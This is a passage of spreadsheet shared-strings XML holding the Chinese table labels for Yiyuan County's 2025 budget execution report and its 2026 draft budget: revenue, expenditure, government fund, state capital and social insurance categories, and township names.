        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>车船税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>耕地占用税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>契税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>烟叶税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境保护税</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他税收收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政事业性收费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>罚没收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资本经营收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有资源</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资产</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>有偿使用收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>捐赠收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府新增一般债券转贷收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    地方政府再融资一般债券转贷收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>返还性收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上级一般性转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上级专项转移支付收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    下级上解</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>动用预算稳定调节基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>调入资金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上年结转及结余收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>区域间转移支付收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>15</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县县级一般公共预算支出执行情况表</t>
  </si>
  <si>
    <t>一、一般公共服务支出</t>
  </si>
  <si>
    <t>二、外交支出</t>
  </si>
  <si>
    <t>三、国防支出</t>
  </si>
  <si>
    <t>四、公共安全支出</t>
  </si>
  <si>
    <t>五、教育支出</t>
  </si>
  <si>
    <t>六、科学技术支出</t>
  </si>
  <si>
    <t>七、文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t>八、社会保障和就业支出</t>
  </si>
  <si>
    <t>九、卫生健康支出</t>
  </si>
  <si>
    <t>十、节能环保支出</t>
  </si>
  <si>
    <t>十一、城乡社区支出</t>
  </si>
  <si>
    <t>十二、农林水支出</t>
  </si>
  <si>
    <t>十三、交通运输支出</t>
  </si>
  <si>
    <t>十四、资源勘探工业信息等支出</t>
  </si>
  <si>
    <t>十五、商业服务业等支出</t>
  </si>
  <si>
    <t>十六、金融支出</t>
  </si>
  <si>
    <t>十七、援助其他地区支出</t>
  </si>
  <si>
    <t>十八、自然资源海洋气象等支出</t>
  </si>
  <si>
    <t>十九、住房保障支出</t>
  </si>
  <si>
    <t>二十、粮油物资储备支出</t>
  </si>
  <si>
    <t>二十一、灾害防治及应急管理支出</t>
  </si>
  <si>
    <t>二十二、债务付息支出</t>
  </si>
  <si>
    <t>二十三、债务发行费用支出</t>
  </si>
  <si>
    <t>二十四、其他支出</t>
  </si>
  <si>
    <t>补助下级</t>
  </si>
  <si>
    <t>表16</t>
  </si>
  <si>
    <t>2025年沂源县对下税收返还及转移支付分项目分地区执行情况表</t>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>南鲁山镇</t>
  </si>
  <si>
    <t>鲁村镇</t>
  </si>
  <si>
    <t>悦庄镇</t>
  </si>
  <si>
    <t>东里镇</t>
  </si>
  <si>
    <t>西里镇</t>
  </si>
  <si>
    <t>大张庄镇</t>
  </si>
  <si>
    <t>燕崖镇</t>
  </si>
  <si>
    <t>中庄镇</t>
  </si>
  <si>
    <t>张家坡镇</t>
  </si>
  <si>
    <t>石桥镇</t>
  </si>
  <si>
    <t>一、税收返还</t>
  </si>
  <si>
    <t>二、一般性转移支付</t>
  </si>
  <si>
    <t xml:space="preserve">    体制补助收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他一般性转移支付</t>
  </si>
  <si>
    <t>三、专项转移支付</t>
  </si>
  <si>
    <t xml:space="preserve">    社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农林水支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>17</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县县级政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <t>项     目</t>
  </si>
  <si>
    <t>一、农网还贷资金收入</t>
  </si>
  <si>
    <t>二、海南省高等级公路车辆通行附加费收入</t>
  </si>
  <si>
    <t>三、港口建设费收入</t>
  </si>
  <si>
    <t>四、国家电影事业发展专项资金收入</t>
  </si>
  <si>
    <t>五、国有土地收益基金收入</t>
  </si>
  <si>
    <t>六、农业土地开发资金收入</t>
  </si>
  <si>
    <t>七、国有土地使用权出让收入</t>
  </si>
  <si>
    <t>八、大中型水库库区基金收入</t>
  </si>
  <si>
    <t>九、彩票公益金收入</t>
  </si>
  <si>
    <t>十、城市基础设施配套费收入</t>
  </si>
  <si>
    <t>十一、小型水库移民扶助基金收入</t>
  </si>
  <si>
    <t>十二、国家重大水利工程建设基金收入</t>
  </si>
  <si>
    <t>十三、车辆通行费</t>
  </si>
  <si>
    <t>十四、污水处理费收入</t>
  </si>
  <si>
    <t>十五、彩票发行机构和彩票销售机构的业务费用</t>
  </si>
  <si>
    <t>十六、其他政府性基金收入</t>
  </si>
  <si>
    <t>十七、专项债券对应项目专项收入</t>
  </si>
  <si>
    <t>本年基金收入合计</t>
  </si>
  <si>
    <t>地方政府专项债务转贷收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府新增专项债券转贷收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府再融资专项债券转贷收入</t>
  </si>
  <si>
    <t>转移性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上级补助收入</t>
  </si>
  <si>
    <t xml:space="preserve">    调入资金</t>
  </si>
  <si>
    <t xml:space="preserve">    上年结转及结余收入</t>
  </si>
  <si>
    <t>收入总计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>18</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县县级政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>项</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">       </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>目</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    国家电影事业发展专项资金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    旅游发展基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家电影事业发展专项资金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>三、节能环保支出</t>
  </si>
  <si>
    <t xml:space="preserve">    可再生能源电价附加收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    废弃电器电子产品处理基金支出</t>
  </si>
  <si>
    <t>四、城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地收益基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农业土地开发资金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城市基础设施配套费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    污水处理费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    土地储备专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    棚户区改造专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城市基础设施配套费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    污水处理费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    海南省高等级公路车辆通行附加费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">  超长期特别特别国债安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">  彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t>本年基金支出合计</t>
  </si>
  <si>
    <t xml:space="preserve"> 地方政府专项债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府新增专项债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府再融资专项债券还本支出</t>
  </si>
  <si>
    <t>转移性支出</t>
  </si>
  <si>
    <t xml:space="preserve">    上解上级支出</t>
  </si>
  <si>
    <t xml:space="preserve">  补助下级</t>
  </si>
  <si>
    <t xml:space="preserve">    调出资金</t>
  </si>
  <si>
    <t xml:space="preserve">    年终累计结余</t>
  </si>
  <si>
    <t>支出总计</t>
  </si>
  <si>
    <t>表19</t>
  </si>
  <si>
    <t>2025年县级对下政府性基金转移支付决算草案表</t>
  </si>
  <si>
    <t>大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t>国有土地使用权出让收入安排的支出</t>
  </si>
  <si>
    <t>污水处理费安排的支出</t>
  </si>
  <si>
    <t>彩票公益金安排的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>南鲁山镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>鲁村镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>悦庄镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>东里镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>西里镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大张庄镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>燕崖镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中庄镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>张家坡镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>石桥镇</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>20</t>
    </r>
  </si>
  <si>
    <t>2025年沂源县县级国有资本经营预算收入
执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资本经营预算企业利润收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>二、股利、股息收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有参股公司股利、股息收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国有资本经营预算企业股利、股息收入</t>
    </r>
  </si>
  <si>
    <t>表21</t>
  </si>
  <si>
    <t>2025年沂源县县级国有资本经营预算支出
执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>比上年
增长</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="黑体"/>
        <charset val="134"/>
      </rPr>
      <t>%</t>
    </r>
  </si>
  <si>
    <t>表22</t>
  </si>
  <si>
    <t>2025年沂源县对下国有资本经营预算转移支付
分项目分地区执行情况表</t>
  </si>
  <si>
    <t>地   区</t>
  </si>
  <si>
    <t>合　计</t>
  </si>
  <si>
    <t>其中：</t>
  </si>
  <si>
    <t>国有企业退休人员社会化管理补助支出</t>
  </si>
  <si>
    <t>国有企业办职教幼教补助支出</t>
  </si>
  <si>
    <t>其他国有资本经营预算支出</t>
  </si>
  <si>
    <t>备注：没有对下转移支付也要公开空表。</t>
  </si>
  <si>
    <t>表23</t>
  </si>
  <si>
    <t>2025年沂源县县级社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <t>表24</t>
  </si>
  <si>
    <t>2025年沂源县县级社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <t>表25</t>
  </si>
  <si>
    <t>2025年沂源县县级社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>第三部分 
2026年全县预算草案</t>
  </si>
  <si>
    <t>表26</t>
  </si>
  <si>
    <t xml:space="preserve">   2026年沂源县一般公共预算收入草案表（代编）</t>
  </si>
  <si>
    <t>项    目</t>
  </si>
  <si>
    <t>2026年预算数</t>
  </si>
  <si>
    <t>一、税收收入</t>
  </si>
  <si>
    <t>增值税</t>
  </si>
  <si>
    <t>企业所得税</t>
  </si>
  <si>
    <t>个人所得税</t>
  </si>
  <si>
    <t>资源税</t>
  </si>
  <si>
    <t>城市维护建设税</t>
  </si>
  <si>
    <t>房产税</t>
  </si>
  <si>
    <t>印花税</t>
  </si>
  <si>
    <t>城镇土地使用税</t>
  </si>
  <si>
    <t>土地增值税</t>
  </si>
  <si>
    <t>车船税</t>
  </si>
  <si>
    <t>耕地占用税</t>
  </si>
  <si>
    <t>契税</t>
  </si>
  <si>
    <t>烟叶税</t>
  </si>
  <si>
    <t>环境保护税</t>
  </si>
  <si>
    <t>其他税收收入</t>
  </si>
  <si>
    <t>二、非税收入</t>
  </si>
  <si>
    <t>专项收入</t>
  </si>
  <si>
    <t>行政事业性收费收入</t>
  </si>
  <si>
    <t>罚没收入</t>
  </si>
  <si>
    <t>国有资本经营收入</t>
  </si>
  <si>
    <t>国有资源(资产)有偿使用收入</t>
  </si>
  <si>
    <t>捐赠收入</t>
  </si>
  <si>
    <t>收入合计</t>
  </si>
  <si>
    <t>三、债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府新增一般债券转贷收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资一般债券转贷收入</t>
    </r>
  </si>
  <si>
    <t>四、转移性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    返还性收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上级一般性转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上级专项转移支付收入</t>
  </si>
  <si>
    <t xml:space="preserve">    动用预算稳定调节基金</t>
  </si>
  <si>
    <t xml:space="preserve">  区域间转移性收入</t>
  </si>
  <si>
    <t>表27</t>
  </si>
  <si>
    <t xml:space="preserve">   2026年沂源县一般公共预算支出草案表（代编）</t>
  </si>
  <si>
    <t>二十二、预备费支出</t>
  </si>
  <si>
    <t>二十三、债务付息支出</t>
  </si>
  <si>
    <t>二十四、债务发行费用支出</t>
  </si>
  <si>
    <t>二十五、其他支出</t>
  </si>
  <si>
    <t>支出合计</t>
  </si>
  <si>
    <t>地方政府一般债务还本支出</t>
  </si>
  <si>
    <t>地方政府其他一般债券还本支出</t>
  </si>
  <si>
    <t>地方政府再融资一般债券还本支出</t>
  </si>
  <si>
    <t>一般转移支付支出</t>
  </si>
  <si>
    <t>上级上解支出</t>
  </si>
  <si>
    <t>安排预算稳定调节基金</t>
  </si>
  <si>
    <t>调出资金</t>
  </si>
  <si>
    <t>结转下年支出</t>
  </si>
  <si>
    <t>表28</t>
  </si>
  <si>
    <t>2026年沂源县政府性基金预算收入草案表（代编）</t>
  </si>
  <si>
    <t>一、国有土地收益基金收入</t>
  </si>
  <si>
    <t>二、农业土地开发资金收入</t>
  </si>
  <si>
    <t>三、国有土地使用权出让收入</t>
  </si>
  <si>
    <t>四、大中型水库库区基金收入</t>
  </si>
  <si>
    <t>五、彩票公益金收入</t>
  </si>
  <si>
    <t>六、城市基础设施配套费</t>
  </si>
  <si>
    <t>七、污水处理费收入</t>
  </si>
  <si>
    <t>八、其他政府性基金收入</t>
  </si>
  <si>
    <t>九、专项债务对应项目专项收入</t>
  </si>
  <si>
    <t>本年收入合计</t>
  </si>
  <si>
    <t>表29</t>
  </si>
  <si>
    <t>2026年沂源县政府性基金预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>一、文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    国家电影事业发展专项资金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>二、城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农业土地开发资金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城市基础设施配套费及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    污水处理费收入及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    超长期特别国债安排的支出</t>
  </si>
  <si>
    <t>三、农林水支出</t>
  </si>
  <si>
    <t>四、交通运输支出</t>
  </si>
  <si>
    <t>五、资源勘探信息等支出</t>
  </si>
  <si>
    <t>六、其他支出</t>
  </si>
  <si>
    <t>七、债务付息支出</t>
  </si>
  <si>
    <t>八、抗疫特别国债安排的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>本年基金支出合计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府专项债务还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府新增专项债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">          </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府再融资专项债券还本支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>转移性支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>上解上级支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">         </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
